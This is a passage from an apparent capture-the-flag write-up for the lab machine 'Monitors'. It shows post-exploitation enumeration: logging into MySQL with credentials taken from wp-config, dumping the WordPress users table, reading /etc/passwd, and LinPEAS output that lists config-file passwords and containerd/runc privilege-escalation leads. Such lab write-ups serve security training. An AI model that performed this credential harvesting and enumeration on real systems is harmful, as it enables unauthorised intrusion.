6. Box enumeration as www-data

www-data@monitors:/usr/share/cacti$ mysql -u wpadmin -p
Enter password: BestAdministrator@2020!
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.00 sec)

mysql> select user_login,user_pass, user_email from wp_users;
+------------+------------------------------------+-------------------+
| user_login | user_pass                          | user_email        |
+------------+------------------------------------+-------------------+
| admin      | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 | admin@monitor.htb |
+------------+------------------------------------+-------------------+
# we already know the admin password, so there is no need to crack this hash

# checking the folder name, which took me many attempts
www-data@monitors:/usr/share/cacti$ cd /var/www
www-data@monitors:/var/www$ ls -la
total 12
drwxr-xr-x  3 root     root     4096 Nov 10  2020 .
drwxr-xr-x 15 root     root     4096 Nov 10  2020 ..
drwxr-xr-x  5 www-data www-data 4096 Apr 21 20:19 wordpress

www-data@monitors:/var/www/wordpress$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

Had issues transferring files: neither wget nor curl was available, so I used the __curl bash function instead.

PEAS

# processes
root       1343  0.0  1.1 978804 48124 ?        Ssl  19:07   0:00 /usr/bin/containerd
root       2113  0.0  0.1 110228  5660 ?        Sl   19:07   0:00  _ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/d76094c5f30c08c24b23d78c5895d61ea5262ce4095f76efa04031a2502c3be5 -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root       2138  0.1  2.0 3410072 83344 ?       Ssl  19:07   0:05      _ /usr/local/openjdk-8/bin/java -Dorg.gradle.appname=gradlew -classpath /usr/src/apache-ofbiz-17.12.01/gradle/wrapper/gradle-wrapper.jar org.gradle.wrapper.GradleWrapperMain --offline ofbiz
root       1660  0.0  2.0 1344420 82372 ?       Ssl  19:07   0:02 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock


╣ Interfaces
br-968a1c1855aa: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:c5:ff:fb:68  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
		
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        inet6 fe80::42:c1ff:fe0b:d224  prefixlen 64  scopeid 0x20<link>
        ether 02:42:c1:0b:d2:24  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 5  bytes 446 (446.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
		
veth67dfbca: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::b401:24ff:fe71:571a  prefixlen 64  scopeid 0x20<link>
        ether b6:01:24:71:57:1a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 21  bytes 1662 (1.6 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
		
╣ Active Ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8443          0.0.0.0:*               LISTEN      -

╣ Users with console
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
root:x:0:0:root:/root:/bin/bash

╣ PHP exec extensions
/etc/apache2/sites-enabled/000-default.conf
/etc/apache2/sites-enabled/cacti-admin.monitors.htb.conf
/etc/apache2/sites-enabled/monitors.htb.conf

╣ Analyzing Wordpress Files (limit 70)
-rwxr-xr-x 1 www-data www-data 3117 Oct 15  2020 /var/www/wordpress/wp-config.php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpadmin' );
define( 'DB_PASSWORD', 'BestAdministrator@2020!' );
define( 'DB_HOST', 'localhost' );

-rw-r--r-- 1 998 998 361 Nov 11  2020 /srv/gitlab/data/.gitconfig


╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation
runc was found in /usr/bin/runc, you may be able to escalate privileges with it

-rw-r--r-- 1 root root 5140 Nov 10  2020 /usr/share/cacti/cacti/include/config.php
-rw-r--r-- 1 www-data www-data 5144 May  3  2020 /usr/share/cacti/cacti/include/config.php.dist
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_username = 'cacti';
$database_password = 'cactipass';
$database_port     = '3306';
